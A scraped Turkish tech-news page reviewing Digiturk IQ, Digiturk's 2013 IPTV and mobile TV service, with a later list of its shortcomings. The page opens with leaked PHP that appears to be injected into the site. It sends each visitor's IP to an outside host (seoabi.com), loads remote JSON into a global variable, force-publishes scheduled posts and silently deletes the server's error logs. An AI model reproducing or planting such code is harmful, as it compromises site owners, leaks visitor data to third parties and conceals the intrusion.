$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Digiturk IQ "Dilediğin zaman, dilediğin yerde" | Teknoloji Haberleri

Digiturk IQ “Dilediğin zaman, dilediğin yerde”

Digiturk’un yeni IPTV ve Mobil TV uygulaması Digiturk IQ hizmeti 1 Mart 2013 günü İstanbul Kuruçeşme Suada’da düzenlenen basın toplantısı ile tanıtıldı. “Dilediğin zaman, dilediğin yerde” sloganı ile başlayan hizmetin reklam yüzü Nil Karaibrahimgil oldu. Hizmetin reklamı bugün televizyon kanallarında yayınlanmaya başlayacak.

 

Digiturk IQ, uydu alıcıları ile IPTV olarak, tabletler ve akıllı telefonlarda Digiturk IQ uygulaması Mobil TV olarak ve internet üzerinde www.digiturkiq.com.tr adresine girerek çalıştırılabilecek. Digiturk uydu alıcısının (receiver) modeli HM 9502, HM9503, DT 9102 ve DT 9103 olan üyeler herhangi ek bir cihaza gerek kalmadan uydu alıcısı cihazlarına internet bağlamak suretiyle IPTV uygulamasından faydalanabilecekler. Android ve iOS işletim sistemi bulunan tablet ve akıllı cep telefonlarında ise uygulama marketlerinden ücretsiz olarak indirilebilen Digiturk IQ uygulaması ile faydalanmak mümkün oluyor. İnternet üzerinden uygulamayı çalıştıracak kullanıcılar digiturkiq.com.tr adresinden bu işlemi gerçekleştirebiliyorlar. Canlı yayınlarda, canlı yayını durdurarak 12 saat öncesine gidilerek programlar tekrar izlenebiliyor.

 

Her platformda uygulama Canlı İzle, Tekrar İzle, Seç İzle ve Kirala İzle bölümlerini barındırıyor. Kullanıcı istediği bir bölüme giderek izleyeceği programı seçebiliyor. Muhtemelen Digiturk’ün oldukça eski bir yayıncı şirket olması nedeniyle bu bölümleri Mobil ve IPTV uygulamaları bulunan Tivibu’dan daha fazla değerlendirebileceğini öngörüyoruz. Digiturk’ün halen gelirlerinin %40’lık bölümünü Lig TV kullanıcıları oluşturuyor. Ancak yetkililer Türk halkının Lig TV’ye olan ilgisinin Türk Futbolundaki şike olayından sonra azaldığını, film servislerine ise ilginin arttığını belirtiyorlar.

 

Tanıtımda Digiturk Pazarlama ve Satıştan Sorumlu Genel Müdür Yardımcısı Çağrı Dönmez, Digiturk IQ projesiyle ilgili olarak ;  “Digiturk IQ ile kullanıcıların hiç bir programı kaçırmadan, özgürce, İstedikleri zaman diledikleri yayını izleyebilmelerini ve kendi yayın akışlarını oluşturabilmelerini sağlıyoruz. IQ’nun smartTV’lerden farklılaşan en önemli özelliği portal üzerinden ulusal ve Digiturk kanallardaki popüler dizi ve programların tekrarlarına ulaşabilmesi. Bu sayede dizilerinizi kaçırmıyor, dilediğiniz zaman izleyebiliyorsunuz.” dedi. Ayrıca Dönmez 2010 yılında başladıkları 3D yayıncılıkla ilgili gelişmeler hakkında da kısa bilgiler verdi. Halen 25 HD kanal yayını bulunan Digiturk’teki HD kanal sayısının 30’a çıkacağını, HD’nin artık günümüzde olmazsa olmazlardan birisi haline geldiğini belirtti.

 

Digiturk IQ uygulamasında bir diğer yenilik ise kullanıcıların izledikleri programların bir hafta süreyle arşivlenmesi ve istenildiğinde bu programların tekrar izlenilmesi olacak. Ayrıca  Facebook, Twitter, Vikipedia, Youtube, Picasa gibi internet hizmetlerine de uygulama içerisinde yer veriliyor. Böylelikle internete bağlanma özelliği bulunmayan televizyonlar da internet üzerindeki sosyal ağlara bağlanır hale geliyor. Uygulamada canlı olarak izlenen bir kanal istenildiği takdirde kendi hard diskinize de kayıt edilebiliyor.(Digiturk uygulaması maalesef henüz bu aşamaya gelememiş.)

 

Geçtiğimiz yıllarda Lig TV için çözümler sunan belli, başlı ürünler piyasaya çıkmıştı. Bunlara örnekler ise; ilk başlarda normal kart modülü bulunan uydu cihazlarına takılabilen şifre çözücü kartlardı. Daha sonra kullanıcılar gelişen İnternet teknolojisi altyapısına uygun olarak Lig TV’yi Mobil TV olarak izlemek istediler ve bu doğrultuda www.digiturkplay.com.tr ve Turkcell Mobil TV uygulamaları ile gündeme geldiler. Digiturk belki de IPTV ve Mobil TV için Türkiye’de İnternet hızlarının artmasını beklemiş olabilir. Ancak yine de süreci kaçırdığı ve geç kaldığı herkes tarafından kabul görüyor.

 

09 Mart 2013 tarihi ile habere ek;

IPTV ve Mobil TV’ye uyun olarak Tivibu’dan daha fazla özellik sunacağını düşündüğümüz Digiturk’un bu uygulaması maalesef sınıfta kaldı. İşte eksileri:

– IPTV ve Mobil TV’ye internet üzerinden kayıt imkanınız bulunmuyor. Yani ben yalnızca internet üzerinden izlemek istiyorum diyorsanız, böyle bir uygulama yok. Digiturk kutusunu muhakkak almalısınız.

– Kanallar çok yetersiz. 30’a çıksa bile belgesel ve film kanallarını asla internet üzerinden izleyemiyorsunuz.

– Haberi yaptığımız 02 Mart 2013 tarihinden bu yana Digiturk IPTV ve Mobil TV uygulamasına reklamlara dünya kadar para dökmesine rağmen hala internet sitesi üzerinde geçebilmiş değil. (Çok büyük kafa karışıklığı yaşadığı aşikâr.)

– Aynı anda DigiturkIQ servisine yalnızca bir yerden ulaşabilirsiniz. Örneğin hem akıllı telefonunuzdaki uygulamadan, hem internet üzerinden aynı anda asla bağlanamazsınız.

– Belgesel ve filmleri yalnızca Seç-İzle bölümünden izleyebiliyorsunuz.  Bu kanallar DigiturkIQ’da mevcut değil.

Olumsuz ve negatif yönleri fazla olan DigiturkIQ uygulaması bizce maalesef Digiturk’un üstün özellikli diyerek bahsettiği veya IPTV ya da Mobil TV tanımlarını hak etmiyor.

Bir Yorum Yaz

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir